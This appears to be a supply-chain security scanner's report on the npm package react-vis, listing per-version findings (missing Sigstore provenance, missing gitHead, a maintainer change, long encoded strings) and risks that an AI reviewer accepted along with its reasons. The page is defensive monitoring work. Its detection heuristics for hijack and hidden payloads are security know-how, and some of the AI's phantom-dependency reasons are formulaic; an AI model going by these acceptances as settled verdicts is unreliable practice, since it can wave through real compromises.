react-vis
Data visualization library based on React and d3.
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| npm-metadata | suspicious-initial-version | AI (npm-metadata): react-vis 0.0.0 is the legitimate initial release of Uber's well-known data visualization library, not a throwaway malicious package. 87k weekly downloads and 3700+ day history confirm legitimacy. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): d3-geo and d3-contour are official D3 packages; adding them to a D3-based visualization library is expected and benign. | ai | |
| maintainer-change | maintainer-added | AI (maintainer-change): New maintainers include uber-ospo, consistent with Uber's OSS governance transition. No malicious indicators. | ai | |
| provenance | publisher-changed | AI (provenance): Publisher kenns29 has strong track record (120 approved, 0 rejected, 3+ years). Change aligns with Uber OSS team transition. | ai | |
| maintainer-change | maintainer-removed | AI (maintainer-change): Removal of 'uber' account is part of the same organizational transition to uber-ospo and named maintainers. | ai | |
| maintainer-change | maintainer-takeover | AI (maintainer-change): Transition includes uber-ospo (Uber's OSPO), indicating an organized internal handoff. Publisher kenns29 has 120 approved packages and a 3+ year track record. Legitimate org transition. | ai | |
| phantom-deps | phantom-dep:d3-format | AI (phantom-deps): D3-format is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-sankey | AI (phantom-deps): D3-sankey is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-contour | AI (phantom-deps): D3-contour is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-hierarchy | AI (phantom-deps): D3-hierarchy is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-collection | AI (phantom-deps): D3-collection is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-interpolate | AI (phantom-deps): D3-interpolate is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:deep-equal | AI (phantom-deps): Deep-equal is a declared dependency used indirectly by react-vis; expected pattern for utility libraries. | ai | |
| phantom-deps | phantom-dep:global | AI (phantom-deps): Global is a declared dependency used indirectly by react-vis; expected pattern for polyfill/utility libraries. | ai | |
| phantom-deps | phantom-dep:prop-types | AI (phantom-deps): Prop-types is a declared dependency used indirectly by react-vis components; expected pattern for React libraries. | ai | |
| phantom-deps | phantom-dep:react-motion | AI (phantom-deps): React-motion is a declared dependency used indirectly by react-vis; expected pattern for animation libraries. | ai | |
| phantom-deps | phantom-dep:react-test-renderer | AI (phantom-deps): React-test-renderer is a declared dependency used indirectly by react-vis testing; expected pattern for test utilities. | ai | |
| phantom-deps | phantom-dep:d3-voronoi | AI (phantom-deps): D3-voronoi is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-geo | AI (phantom-deps): D3-geo is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-array | AI (phantom-deps): D3-array is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-color | AI (phantom-deps): D3-color is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-scale | AI (phantom-deps): D3-scale is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| phantom-deps | phantom-dep:d3-shape | AI (phantom-deps): D3-shape is a declared dependency used indirectly by react-vis visualization components; expected pattern for data viz library. | ai | |
| provenance | missing-githead | AI (provenance): Established package with 108 versions and clean publisher history; missing gitHead is a process gap, not a security indicator for this package. | ai | |
| provenance | no-provenance | AI (provenance): react-vis predates Sigstore provenance requirements; absence of attestation is expected for this long-running package. | ai | |
| phantom-deps | phantom-dep:hoek | AI (phantom-deps): hoek is explicitly declared as a runtime dependency in package.json at version 4.2.1; the phantom-dep finding is a false positive for this package. | ai | |
| source-diff | encoded-string-file:dist/dist.min.js | AI (source-diff): dist/dist.min.js is the documented browserify+uglifyjs browser bundle output for react-vis. Long encoded strings are standard minified d3/React bundle content, not obfuscation. | ai |
Versions (showing 51 of 101)
| Version | Deps | Published |
|---|---|---|
| 1.12.1 | 17 / 34 | |
| 1.12.0 | 17 / 34 | |
| 1.11.12 | 18 / 33 | |
| 1.11.11 | 17 / 33 | |
| 1.11.10 | 17 / 33 | |
| 1.11.8 | 17 / 33 | |
| 1.11.7 | 18 / 33 | |
| 1.11.6 | 18 / 33 | |
| 1.11.5 | 18 / 33 | |
| 1.11.4 | 18 / 32 | |
| 1.11.3 | 18 / 32 | |
| 1.11.2 | 18 / 32 | |
| 1.11.1 | 18 / 29 | |
| 1.11.0 | 18 / 29 | |
| 1.10.8 | 18 / 29 | |
| 1.10.7 | 17 / 29 | |
| 1.10.6 | 17 / 29 | |
| 1.10.5 | 17 / 29 | |
| 1.10.4 | 17 / 29 | |
| 1.10.3 | 17 / 29 | |
| 1.10.2 | 17 / 29 | |
| 1.10.1 | 17 / 28 | |
| 1.10.0 | 17 / 28 | |
| 1.9.4 | 16 / 29 | |
| 1.9.3 | 16 / 29 | |
| 1.9.2 | 16 / 28 | |
| 1.9.1 | 16 / 28 | |
| 1.9.0 | 16 / 28 | |
| 1.8.3 | 16 / 28 | |
| 1.8.2 | 16 / 28 | |
| 1.8.1 | 16 / 28 | |
| 1.8.0 | 16 / 28 | |
| 1.7.10 | 16 / 28 | |
| 1.7.9 | 17 / 27 | |
| 1.7.8 | 17 / 27 | |
| 1.7.7 | 17 / 27 | |
| 1.7.6 | 17 / 27 | |
| 1.7.5 | 18 / 26 | |
| 1.7.4 | 18 / 26 | |
| 1.7.3 | 18 / 26 | |
| 1.7.2 | 17 / 26 | |
| 1.7.1 | 17 / 26 | |
| 1.7.0 | 17 / 26 | |
| 1.6.7 | 17 / 26 | |
| 1.6.6 | 17 / 26 | |
| 1.6.5 | 17 / 26 | |
| 1.6.4 | 17 / 26 | |
| 1.6.3 | 17 / 26 | |
| 1.6.2 | 17 / 26 | |
| 1.6.1 | 16 / 26 | |
| 1.6.0 | 16 / 26 |
v1.12.1
1 findingPackage was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.12.0
2 findingsThis version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.12
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
v1.11.11
2 findings[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
v1.11.10
4 findingsAll previous maintainers (uber) were replaced by new maintainers (kenns29, shengs, emrahs, zacklk, uber-ospo). This is a strong signal of a potential package hijack and requires careful review.
This version was published by a different npm account than previous versions on 2023-01-07. This could indicate a legitimate maintainer transition or an account compromise.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
v1.11.8
2 findingsThis version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: kenns29.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.7
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.6
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.5
2 findingsModified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.4
2 findingsModified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.11.0
2 findingsModified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.8
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.7
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.6
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.5
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.3
2 findingsModified file contains 4 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.10.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.9.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.8.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.10
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.9
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.8
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.7
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.6
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.5
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.7.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.7
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.6
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.5
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.4
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.3
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.2
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.1
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.6.0
1 finding[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.